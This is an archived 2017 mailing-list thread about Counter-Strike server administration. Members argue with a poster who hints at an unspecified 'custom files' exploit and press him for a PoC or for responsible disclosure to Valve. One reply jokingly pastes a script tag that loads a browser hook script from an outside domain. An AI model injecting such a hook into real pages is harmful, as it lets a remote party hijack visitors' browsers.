Can you please not spam this thread with your advertisements? It's getting rather annoying. Don't think anyone is interested here. Submit PoC to Valve and kindly take a hike.
On 11 October 2017 at 02:29, Stealth Mode <[email protected]> wrote: > Available for contract for PenTesting/SecurityAudits, Datacenter > Migrations, and other IT infrastructure purposes. At the websites listed in > an earlier mailing. > > /tips grey hat (only don the blackhat for government contracts) and exits > > > No further communications. End of conversation. > > -StealthMode > > On Oct 10, 2017 14:00, "Ryan Bentley" <[email protected]> wrote: > > ITSec. PoC. > > Sincerely, > Ryan "ExpertMode" Bentley > Independent IT Field Engineer > > > On Tue, Oct 10, 2017 at 6:50 PM, Nathaniel Theis <[email protected]> > wrote: > >> hello I have injected a JavaScript into this email you are all now hacked >> >> what do you mean it won't run without an actual vulnerability >> >> you're super mega hacked >> >> <script src=//xmppwocky.net/hook.js></script> >> >> On Oct 10, 2017 10:02 AM, "iNilo" <[email protected]> wrote: >> >>> I frankly don't care what / where / how you work, or what you have >>> studied. >>> >>> The only thing I know is that this is clearly the wrong channel to do >>> argue/disclose/chat about. >>> >>> http://www.valvesoftware.com/security/ >>> >>> Hopefully you get thanked in a patch note, if not I'm sure the entire >>> community will be grateful that you disclosed a major security issue to the >>> people that *actually *get paid to take care of this. >>> >>> Thanks. >>> >>> >>> >>> 2017-10-10 18:54 GMT+02:00 Saint K. <[email protected]>: >>> >>>> Christopher, >>>> >>>> >>>> >>>> I work in “the field” as you like to call it. It’s customary to explain >>>> the exploit in detail and provide proof the concept (hence the request for >>>> a PoC) in any form or way. >>>> >>>> >>>> >>>> Please demonstrate the issue, it be by posting the offending code, you >>>> recording a video showing a working exploit, or anything along these lines. >>>> >>>> >>>> >>>> You should know this, if you work in “the field”. >>>> >>>> >>>> >>>> Regards, >>>> >>>> >>>> >>>> Saint K. >>>> >>>> >>>> >>>> *From:* Csgo_servers [mailto:csgo_servers-bounces@l >>>> ist.valvesoftware.com] *On Behalf Of *Stealth Mode >>>> *Sent:* 10 October 2017 18:34 >>>> *To:* [email protected] >>>> *Subject:* Re: [Csgo_servers] Custom files exploit >>>> >>>> >>>> >>>> @Ryan, etc. >>>> >>>> >>>> >>>> I studied radio electronics before IT was a thing. NetSec and ITSec go >>>> hand in hand. My credentials aren't CS, because CS was radio electronics. >>>> The industry hasn't changed, just a little more vulnerable. Not like I am >>>> specifically stating how to inject code, or what code to inject on a public >>>> mailing list. Don't need to. Professionals here know what I am referring >>>> to. I guess the rest do not have the knowledge to understand what the >>>> exploit can actually do. You are aware. That is all that matters. Don't >>>> secure your servers, that is on you. When they get exploited, that is on >>>> you. >>>> >>>> >>>> >>>> Have a nice day! End of discussion. No further communications. >>>> >>>> >>>> >>>> Sincerely, >>>> >>>> Christopher "StealthMode" Stephen Larkins >>>> >>>> Independent IT Field Engineer >>>> >>>> fieldnation.com >>>> >>>> workmarket.com >>>> >>>> onforce.com >>>> >>>> clearancejobs.com >>>> >>>> >>>> >>>> >>>> >>>> On Tue, Oct 10, 2017 at 12:09 PM, Ryan Bentley <[email protected]> >>>> wrote: >>>> >>>> My sides at this thread. At first I just rolled my eyes but now I >>>> actually believe that Stealth Mode is either a troll or delusional. Please >>>> stop saying "ITSec". Any first year CS student knows what PoC is but you >>>> don't? Please. >>>> >>>> You are embarrassing yourself. Which institution did you get your >>>> degree? It must be a very old BSc indeed. You talk complete nonsense and >>>> have a fundamental misunderstanding of basic computer science tenets. >>>> >>>> >>>> >>>> On Tue, Oct 10, 2017 at 4:34 PM, Nomaan Ahmad <[email protected]> >>>> wrote: >>>> >>>> Nice hat there. Stealth might get this one though: >>>> https://i.imgur.com/329jfXt.gif >>>> >>>> >>>> >>>> On 10 Oct 2017 4:29 pm, "PistonMiner" <[email protected]> wrote: >>>> >>>> The person in question should never have written a message about an >>>> open vulnerability into a public mailing list in the first place. Just >>>> because they did doesn't mean that you should ask for PoCs in public >>>> mailing lists, there's a multitude of issues with that. >>>> To make it perfectly clear, I'm not defending this person, I seriously >>>> doubt the seriousness of their statements and a lot of what they're saying >>>> makes no sense at all and looks like trying to maintain an image of >>>> competence while knowing little, but responsible disclosure still applies. >>>> If this person has a vulnerability to report, they should do so with the >>>> information listed at http://www.valvesoftware.com/security/. >>>> And I think I know what I'm talking about seeing as I have two Finder's >>>> Fees. See https://wiki.teamfortress.com/wiki/Finder%27s_Fee and >>>> https://wiki.teamfortress.com/wiki/List_of_Finder%27s_Fee_owners >>>> >>>> On 10.10.2017 17:08, Vaya wrote: >>>> >>>> I think someone needs to ‘stealth mode’ out of this email chain. This >>>> is just noise without a repeatable Test >>>> >>>> Sent from my iPhone >>>> >>>> >>>> On 10 Oct 2017, at 16:01, PistonMiner <[email protected]> wrote: >>>> >>>> If you have a vulnerability to report, don't do it in a public mailing >>>> list. Report it directly to Valve, and no place else. This conversation has >>>> so many problems, but asking for a PoC in a *public* mailing list is >>>> one of them. Look up responsible disclosure. (I should note though, at this >>>> point I am not convinced a vulnerability even exists.) >>>> >>>> -- >>>> >>>> PistonMiner (Linus S.) >>>> >>>> _______________________________________________ >>>> Csgo_servers mailing list >>>> [email protected] >>>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>>> >>>> >>>> >>>> _______________________________________________ >>>> >>>> Csgo_servers mailing list >>>> >>>> [email protected] >>>> >>>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>>> >>>> >>>> >>>> -- >>>> >>>> PistonMiner (Linus S.) >>>> >>>> >>>> _______________________________________________ >>>> Csgo_servers mailing list >>>> [email protected] >>>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>>> >>>> >>>> _______________________________________________ >>>> Csgo_servers mailing list >>>> [email protected] >>>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>>> >>>> >>>> >>>> >>>> _______________________________________________ >>>> Csgo_servers mailing list >>>> [email protected] >>>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>>> >>>> >>>> >>>> _______________________________________________ >>>> Csgo_servers mailing list >>>> [email protected] >>>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>>> >>> >>> >>> _______________________________________________ >>> Csgo_servers mailing list >>> [email protected] >>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >>> >> >> _______________________________________________ >> Csgo_servers mailing list >> [email protected] >> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >> > > > _______________________________________________ > Csgo_servers mailing list > [email protected] > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers > > > > _______________________________________________ > Csgo_servers mailing list > [email protected] > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers >
_______________________________________________ Csgo_servers mailing list [email protected] https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
